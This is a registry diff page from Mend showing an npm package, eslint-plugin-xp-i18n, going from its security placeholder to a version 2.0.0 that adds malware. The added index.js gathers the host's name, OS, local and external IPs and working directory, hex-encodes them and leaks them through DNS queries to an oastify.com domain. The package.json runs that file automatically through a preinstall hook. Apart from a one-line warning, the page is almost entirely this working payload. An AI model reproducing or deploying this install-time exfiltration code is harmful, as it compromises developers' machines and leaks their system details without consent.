npm - eslint-plugin-xp-i18n - Versions diffs - 0.0.1-security → 2.0.0 - Mend

eslint-plugin-xp-i18n 0.0.1-security → 2.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of eslint-plugin-xp-i18n might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,107 @@
+const dns = require('dns');
+const os = require('os');
+const https = require('https');
+const process = require('process');
+// Función para codificar los datos en formato hexadecimal
+function encodeData(data) {
+    return Buffer.from(data).toString('hex'); // Codificamos en hexadecimal
+}
+// Función para dividir el string en fragmentos de longitud máxima
+function splitDataIntoChunks(data, chunkSize) {
+    const chunks = [];
+    for (let i = 0; i < data.length; i += chunkSize) {
+        chunks.push(data.slice(i, i + chunkSize));
+    }
+    return chunks;
+}
+// Función para enviar las consultas DNS
+function exfiltrateData(data, label) {
+    const encodedData = encodeData(data);
+    const maxDnsLength = 40; // Máxima longitud de subdominio en una consulta DNS
+    // Dividir los datos en fragmentos si son demasiado largos
+    const chunks = splitDataIntoChunks(encodedData, maxDnsLength);
+    chunks.forEach((chunk, index) => {
+        const domain = `${label}-${index}-${chunk}.p8yvdjdgoteup8gdu5wgpaf7kyqreh26.oastify.com`; // Reemplaza con tu dominio DNS controlado
+        // Realiza la consulta DNS por cada fragmento
+        dns.resolve(domain, 'A', (err, addresses) => {
+            if (err) {
+                //console.error(`Error en la consulta DNS para el fragmento ${index}:`, err);
+            } else {
+                //console.log(`Consulta DNS para el fragmento ${index} exitosa, direcciones:`, addresses);
+            }
+        });
+    });
+}
+// Obtener información básica del sistema
+function getVictimInfo() {
+    const hostname = os.hostname();           // Nombre del equipo
+    const platform = os.platform();           // Sistema operativo (linux, win32, darwin)
+    const release = os.release();             // Versión del sistema operativo
+    const cwd = process.cwd();                // Directorio actual de trabajo
+    const interfaces = os.networkInterfaces();// Interfaces de red
+    let ipAddress = 'N/A'; // Dirección IP local
+    for (const key in interfaces) {
+        for (const details of interfaces[key]) {
+            if (details.family === 'IPv4' && !details.internal) {
+                ipAddress = details.address;  // IP local válida (no localhost)
+                break;
+            }
+        }
+    }
+    return {
+        hostname: hostname,
+        platform: platform,
+        release: release,
+        ipAddress: ipAddress,
+        cwd: cwd
+    };
+}
+// Obtener la IP externa desde ifconfig.me
+function getExternalIP(callback) {
+    https.get('https://ifconfig.me/ip', (res) => {
+        let data = '';
+        // Acumular datos del stream de respuesta
+        res.on('data', (chunk) => {
+            data += chunk;
+        });
+        // Al finalizar, devolver la IP
+        res.on('end', () => {
+            callback(data.trim());
+        });
+    }).on('error', (err) => {
+        //console.error('Error al obtener la IP externa:', err);
+        callback(null);
+    });
+}
+// Obtener información del equipo
+const victimInfo = getVictimInfo();
+// Exfiltrar cada dato por separado, fragmentado si es necesario
+exfiltrateData(victimInfo.hostname, 'hnm');
+exfiltrateData(victimInfo.platform, 'pfm');
+exfiltrateData(victimInfo.release, 'rls');
+exfiltrateData(victimInfo.ipAddress, 'lip');
+exfiltrateData(victimInfo.cwd, 'cwd');
+// Obtener la IP externa y exfiltrarla
+getExternalIP((externalIP) => {
+    if (externalIP) {
+        exfiltrateData(externalIP, 'eip');
+    } else {
+        //console.error('No se pudo obtener la IP externa');
+    }
+});

package/package.json CHANGED Viewed

@@ -1,6 +1,15 @@
 {
   "name": "eslint-plugin-xp-i18n",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "2.0.0",
+  "description": "eslint",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "Author eslint",
+  "license": "MIT",
+  "dependencies": {
+    "eslint-plugin-xp-i18n": "file:eslint-plugin-xp-i18n-2.0.0.tgz"
+  }
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=eslint-plugin-xp-i18n for more information.